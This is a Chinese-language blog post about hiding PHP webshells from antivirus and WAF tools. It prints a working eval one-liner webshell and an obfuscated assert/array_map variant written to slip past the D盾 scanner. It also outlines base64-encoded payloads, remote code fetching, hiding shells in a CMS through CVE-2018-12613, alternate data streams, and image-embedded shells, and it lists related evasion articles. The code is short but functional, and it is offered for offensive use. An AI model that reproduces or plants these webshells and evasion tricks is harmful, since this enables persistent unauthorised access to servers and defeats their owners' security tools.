如何优雅隐藏你的Webshell

1. 优雅的Bypass一句话
2. 优雅的Bypass大马
3. 优雅的隐藏你的Webshell
4. 对于自己的bypass心得以及总结

Bypass思路

1.代码拼接

2.函数回调

1.Bypass一句话

普通的一句话：
<?php eval($_POST['x']); ?> //一句话
使用命令执行过D盾

<?php
function a(){return 'assert';}
$a = a();
$c = array($_POST['x']);
array_map($a,$c = $c);//assert($_POST['x'])?>

2.Bypass大马

1.base64加密恶意代码

2.远程获取执行代码块

3.结合：

绕过WAF

3.隐藏webshell

利用不同的cms隐藏webshell

(1) CVE-2018-12613复现

涉及文件：
• 1：index.php //更改漏洞需求
• 2：libraries/auth/config.default.php //更改验证

cookie作用：默认连接账户

(2)隐藏文件名

可以隐藏，但是还是能直接执行

(3)ADS隐藏文件

(4)服务器权限

包含一句话图片拿shell

TIPS：小知识

防护软件拦截规则：

1.出现eval、request等函数

参考文档：

CVE-2018-12613

Webshell Bypass相关推荐

php限制一个函数在几分钟内不被调用_在PHP一句话木马使用过程中的种种坑点分析...
前言在平时的学习和练习过程中,经常会遇到上传的一句话木马无法执行我们的命令或者说能执行命令但是不能连接菜刀蚁剑等webshell管理工具,以及各个版本PHP所限制的一些一句话木马的写法,不同版本we ...
webshell 常见 Bypass waf 技巧总结
在渗透学习的过程中,总会遇到各种情况,例如 php 大马被 waf 拦截的时候,那么如何制作免杀 php webshell 呢,接下来就由我带各位小伙伴们一起踏上大马免杀之路,不喜勿喷. 一篇好的文章 ...
一次完整的从webshell到域控的探索之路
前言内网渗透测试资料基本上都是很多大牛的文章告诉我们思路如何,但是对于我等小菜一直是云里雾里. 于是使用什么样的工具才内网才能畅通无阻,成了大家一直以来的渴求. 今天小菜我本着所有师傅们无私分享的精 ...
【网络安全】一些webshell免杀的技巧
前言由于杀软的规则在不断更新所以很多之前的过杀软方法基本上都不行了而且随着php7逐渐扩张 assert马也将被淘汰所以本文将提出几种免杀思路效果很好而且不会被杀软的正则和沙盒规则约束. ...
Webshell免杀绕过waf
转自圈子404师傅 0x01 前言# 尽最大努力在一文中让大家掌握一些有用的WEBSHELL免杀技巧 0x02 目录# 关于eval 于 assert 字符串变形定义函数绕过回调函数回调函数变形 ...
php禁用了所有命令执行的函数怎么搞,PHP通过bypass disable functions执行系统命令的方法汇总...
一.为什么要bypass disable functions 为了安全起见,很多运维人员会禁用PHP的一些"危险"函数,例如eval.exec.system等,将其写在php.in ...
ASP WebShell 后门脚本与免杀
随着时间的推移和其它新型动态网页技术的兴起,使用ASP(Active Server Page)技术构建的Web应用越来越少.ASP的衰落.旧资料和链接的失效.前辈们早期对ASP较多的研究,都导致了新型 ...
红与蓝：现代Webshell检测引擎免杀对抗与实践
上半年Webshell话题很火,业界举办了数场对抗挑战赛,也发布了多篇站在安全产品侧,着重查杀思路的精彩文章,但鲜有看到以蓝军视角为主的paper. 作为多场挑战赛的参赛者及内部红蓝对抗的参与者,笔者 ...
java webshell_都0202年了老嗨还在用的 - 各种姿势jsp webshell
最近,我的朋友"老嗨",他参加了一个某云举办的号称可能史上最强的使用了AI技术的Webshell检测系统挑战赛...因为我没什么时间去搞这个,所以,我把我珍藏多年,姿势比较多的JS ...

Webshell Bypass